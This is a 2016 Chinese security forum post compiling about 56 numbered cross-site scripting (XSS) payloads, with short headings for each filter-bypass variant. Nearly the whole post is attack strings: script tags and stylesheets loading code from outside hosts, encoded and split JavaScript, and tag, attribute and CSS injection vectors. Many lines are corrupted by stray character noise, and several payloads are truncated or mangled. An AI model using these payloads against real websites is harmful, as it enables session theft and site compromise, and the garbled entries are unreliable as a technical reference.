找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2325|回复: 0
打印 上一主题 下一主题

XSS攻击汇总

[复制链接]
跳转到指定楼层
楼主
发表于 2016-4-28 10:06:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
(1)普通的XSS JavaScript注入3 c( }* J+ F! s3 B4 U8 O! D
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>, H- U- Y+ P+ z/ _' b2 P* M
(99)另类弹框

6 b  Q+ C8 O; W- W: D<q/oncut=alert()>1, P) l3 w2 D1 \9 j
<s/onclick=alert()>b3 R4 E1 q: n8 z! ~9 @
<XSS=" onclick="alert(1)//">clickme</SSX=">0 _! J$ M; V9 W- _
<zzz onclick=alert`1`>clickme</zzz>
7 T& @: _- G3 @ <a onclick=alert`1`>clickme</a>
5 [& Y" K* D+ R. f& g+ z/ {0 M* O+ s<a=">clickme</a=">3 H0 \9 C2 [; V6 \% L
<a=">clickme</a>
$ }0 L; H6 X0 X6 N% P7 ^( i. [<z=">clickme</z=">8 I$ R' v" f5 q0 Q7 {
<z onclick=alert`1`>clickme</z>
! @( p( b& W* X
( a2 I+ X( S' q0 m8 ?(2)IMG标签XSS使用JavaScript命令& k' V) i& R3 j6 |. z6 K- v
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
* ?, j5 k9 M" z% ~2 e

2 p8 V$ k% c+ @, z  K/ e
(3)IMG标签无分号无引号
& B+ Y* }! C' h: p( T2 _. F+ \
<IMG SRC=javascript:alert(‘XSS’)>
5 ]( ]7 h( `! ~3 v' @4 |# c

- y' e$ v' [/ l% N* \( }0 B
(4)IMG标签大小写不敏感; g3 H- m3 D+ N, {( x$ e" U
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>+ p  y: \4 u# z2 q6 e
1 Y( j' j; T5 w' Z) B
(5)HTML编码(必须有分号)
  P. R" x9 s" e  ?" _
<IMG SRC=javascript:alert(“XSS”)>4 G1 @& q6 Y$ }# [8 Y
( k6 S9 E! `+ e% X6 J' N
(6)修正缺陷IMG标签
8 T1 w' Z  n# y7 h
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
5 O" U7 w" J5 a+ ~

8 h: ^" \" Y. |5 \% m# _
(7)formCharCode标签(计算器)
. R/ N% {* ?) {
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
& ^4 C8 ?6 ^" t3 z# W( B

, D% A7 g: C& _" u
(8)UTF-8的Unicode编码(计算器)6 m' m' y0 N* L- }
<IMG SRC=jav..省略..S')>
! ^/ n) [7 }( ~, m8 x+ f
! q8 ?% i$ H2 T, v1 p  a
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)# [! w( g! k7 ?
<IMG SRC=jav..省略..S')>
( e: l, o& n2 t9 o" @) X; ?2 A
7 P& C' P7 g/ z9 H* @% t$ T; _; r" p
(10)十六进制编码也是没有分号(计算器)
. Q0 Y( K6 x  p9 k% a/ ?% b4 C
<IMG SRC=\'#\'" /span>
; w5 D1 I7 g" v9 r$ Z0 n$ u3 s* h5 _. a
(11)嵌入式标签,将Javascript分开
' g6 I" S+ Z$ x" Q- j3 u<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>: S8 n3 b' j1 ^' n8 N, p
. d) z$ K2 F8 }6 ^. `3 r( t8 ~* Z
(12)嵌入式编码标签,将Javascript分开
+ U7 w% k4 y/ P/ M<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
0 v1 M) G% B4 ~6 c
+ M, u0 q" w& p( ?/ m2 @(13)嵌入式换行符7 Q0 Y# M& ~" ]
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
7 d) e8 Y" |9 I( }: S1 ?
* Z* V# ~# {3 x- P+ x9 L* X(14)嵌入式回车
( n0 N& j1 M7 s; r) c# P<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>/ K, k9 G) c2 Y5 b5 z8 B) k$ z

+ K9 \9 A# N$ u3 w( t5 i(15)嵌入式多行注入JavaScript,这是XSS极端的例子3 V" K! ~. L3 _0 ?8 ^; j
<IMG SRC=\'#\'" /span>
  v0 y/ ^) v; ^  y, y: ?2 `; u
' m2 t9 ?: X6 d% E. c% `; T4 F(16)解决限制字符(要求同页面)
+ C( w$ f; g3 R0 X3 k<script>z=’document.’</script>
7 T% M, W0 O# ?: W* V; `6 Y<script>z=z+’write(“‘</script>
( ]' x$ }) n& d  o" h<script>z=z+’<script’</script>
" q8 Y7 L  F5 d4 g<script>z=z+’ src=ht’</script>! [, d' ~$ U5 N& y1 u- I( ~- j; v# v: q$ W
<script>z=z+’tp://ww’</script>+ E0 e2 ]+ X& A# @0 s) S
<script>z=z+’w.shell’</script>
# @1 g8 h. ?7 v<script>z=z+’.net/1.’</script>
3 e# l& h9 P! w1 j<script>z=z+’js></sc’</script>
7 ]' V1 w  I9 n: T: |<script>z=z+’ript>”)’</script>
; c" G4 w' \3 e# ]7 P5 {) H( v3 P- V; s<script>eval_r(z)</script>7 W, j# k; w7 }' i; B: c9 i0 F
9 P" k) E, D3 |( V+ e' l
(17)空字符3 `0 S; C5 Z1 r/ k
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out8 G" g' F7 Q# c) k; M4 M. ?
, u1 ?% M" ^% G) E7 j
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用4 \% K* F9 j* u% a; }
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out3 X9 ^2 n/ c+ {- [# `* c( \; n

" A, h: w4 W6 H(19)Spaces和meta前的IMG标签
# p7 |0 S% H" i( D) W2 u, K; }/ `<IMG SRC=\'#\'"   javascript:alert(‘XSS’);”>7 X/ {/ p, }" T+ ?, }

+ p4 O/ w$ c) l$ y, f+ ]8 f(20)Non-alpha-non-digit XSS
, ]$ m9 V( D4 G( U* u! I- d<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>. M( }8 n. L( ?) L. J
, C6 D$ m0 Z' g% x) ~: D
(21)Non-alpha-non-digit XSS to 2* q2 U: F7 W8 k! {: n% d  U
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>2 N" r* y# C( n6 ~' u9 \
% J* r$ T" n; U; q2 t9 ?. \
(22)Non-alpha-non-digit XSS to 3) h* q: S" F2 Z" `) u+ M8 F
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
& M0 u: G7 s! C% c- |+ ?- u" M( h3 m0 E; f, D8 {
(23)双开括号
7 w$ B/ d% u5 j' M( S* k; A$ d<<SCRIPT>alert(“XSS”);//<</SCRIPT>
, f9 s: {% Q  S! t( l" t: t
. ]% c# i+ ]3 M+ G( o+ c2 O(24)无结束脚本标记(仅火狐等浏览器), L3 D: U$ Y8 I
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>7 s0 `$ E$ j9 F0 n# o

3 u* Z. S# O% T# k$ e" m(25)无结束脚本标记2
, E: Y- p& ]+ M8 T$ m7 {3 `' h2 h<SCRIPT SRC=//3w.org/XSS/xss.js>8 g  J1 ?* E! w  d# Q

7 K# q% P' ?  h' t1 Y1 q1 a(26)半开的HTML/JavaScript XSS6 |& x" K; y6 J1 ~" v, k
<IMG SRC=\'#\'" /span>
# t* s. _9 U5 P# d6 _* B7 w9 m& g* r' K  Q
(27)双开角括号
: K( g5 `# }2 j/ [2 z<iframe src=http://3w.org/XSS.html <
* w7 |- V6 u- ^0 n, W0 x$ O5 I: N% `, H) B; d; n
(28)无单引号 双引号 分号: F: p4 h1 Z; r/ u. i; o& o
<SCRIPT>a=/XSS/* h2 N1 [1 J. x5 x3 F8 c
alert(a.source)</SCRIPT>
1 d; U0 q* A# m/ X6 k
5 b4 f8 q3 _4 ~0 \9 ~(29)换码过滤的JavaScript' ]" }* l5 S: V) Y0 g" V
\”;alert(‘XSS’);//
" V, [- o7 A. Z( H3 w$ P6 i! ^" I
(30)结束Title标签
8 d) y7 s' w. ?</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>4 }7 z3 M; j6 U3 c% L% T, B) e

/ a1 d. J" p& }. f(31)Input Image
" T' t" h6 `8 D, `<INPUT SRC=\'#\'" /span>) J7 N+ v# H2 m: I- D" d

$ T: V3 z8 ^8 m+ U5 v& P(32)BODY Image; L" }" P( H, c
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
! ~; C8 V) ]0 H2 b4 s- x" I" q0 p
/ S, D- D: U; ?6 g4 E% g( p(33)BODY标签
( h: |* o' H6 q+ Y+ Z<BODY(‘XSS’)>4 @; ^! H3 [" o5 Z8 G8 m, r4 V* ]
2 \2 u7 j6 `- Z0 d% a7 \
(34)IMG Dynsrc
2 }! V6 b7 _. E( B3 U# [& l<IMG DYNSRC=\'#\'" /span>
" I2 e( d, d. l. a6 z0 C' Z, b2 Q/ J7 Y1 {
(35)IMG Lowsrc1 m1 T4 a, }+ v) T
<IMG LOWSRC=\'#\'" /span>( u  ]/ X* ~7 n' V6 S3 F0 J3 y
2 }4 o/ X+ Z5 a) h, z- a
(36)BGSOUND* s& ]- h. R, a+ z6 P3 {5 d; H
<BGSOUND SRC=\'#\'" /span>
3 E+ [" A; c& W9 l- B( I& {: h+ F' u/ A
(37)STYLE sheet
+ L' R* L1 C  h/ Z6 d1 T; G6 E; X<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
# g- h! j( O4 ^6 _! U, V
9 ?- F. o2 {) [% p; |* q* w! L(38)远程样式表
! `8 E1 x& ^6 d<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
# P  U2 b% l+ F" Q+ c! R1 ^  Y: u
  G  l3 X: V. ?9 [- V2 Y) D# w(39)List-style-image(列表式)
+ C7 m4 A# ^9 K$ t" \* D- I0 Z+ u<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
+ m$ V6 X: p$ f- w7 R3 N& Z" w  H1 d1 V7 \
(40)IMG VBscript. h& H: u  o: m& S& S4 }
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS& H% x' S9 h1 f; I
7 v1 [2 U1 X1 s6 S
(41)META链接url
9 @* i$ z2 b0 X9 H2 X# j<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>3 r( I! ^+ n* C
/ e; B* P% x7 j7 F: {4 X
(42)Iframe' j) T, \5 i6 d, i1 }& f, e" I
<IFRAME SRC=\'#\'" /IFRAME>. c9 q7 ^1 k; _3 _( x( V2 e
6 h  I& @' I! V  H( T
(43)Frame0 c; P1 s0 J, N, B" h: B# D
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>- w6 K- A2 a1 q
2 B" }! r6 J8 g! {2 {3 g
(44)Table" `: G4 I! a- i, W
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>6 S& V3 d3 a, p  A0 Z/ B4 l

' K* Q$ j! o' U. c6 S% z, B6 W(45)TD/ C) q% ~( g8 O& |7 d5 k7 p; C
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
/ H3 g/ e  q% K9 J( C# S8 u  W" h2 T* n
(46)DIV background-image' d4 _" j+ Z, L! s0 @/ r6 g( T
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>/ t( E$ C( A" L1 }

7 u8 ~6 y  _8 S$ I(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
# s) L# Q; i% x# C0 {+ h<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>& |" a# G3 `7 e% e
8 u3 r$ m& j) e# k+ u( ^5 x& b
(48)DIV expression' O/ f+ u' \% l
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>% w8 m! X% l: @+ ^7 F

7 A+ g. u/ V; s9 @; Z: Q(49)STYLE属性分拆表达
2 p$ P( B! P  g<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>! A' v. \/ W7 T- b9 ^. Y
$ P. `) K3 T3 Z' b4 Z
(50)匿名STYLE(组成:开角号和一个字母开头). Z+ q6 j- L  b/ t& {# z0 X
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>$ n; J1 E& K' q: r9 R* G
8 |7 v! F2 B! z
(51)STYLE background-image2 h& z" b1 Z1 B
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>( F, `4 q  u# n' j; R2 X

, T5 @0 X: _; w1 ~9 s(52)IMG STYLE方式- z% F' q. H7 b: t- Z3 \
exppression(alert(“XSS”))’>: R5 E  S0 E6 h7 u  q4 B
' P8 q7 I7 u1 W2 D! u
(53)STYLE background, o; ^& B2 M9 D# h
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>% }7 u4 V( m6 I, Z

9 B& S3 J# c! g& u(54)BASE, y7 T# O" R, r% k1 k
<BASE HREF=”javascript:alert(‘XSS’);//”>0 d8 O* U6 t( f( y/ x

4 C% `/ ^. V2 w' ~$ X6 f(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
7 o/ r# G" s2 F- E& c7 Q- X<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>
& w5 l6 `+ t  X! |" f: W: P
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表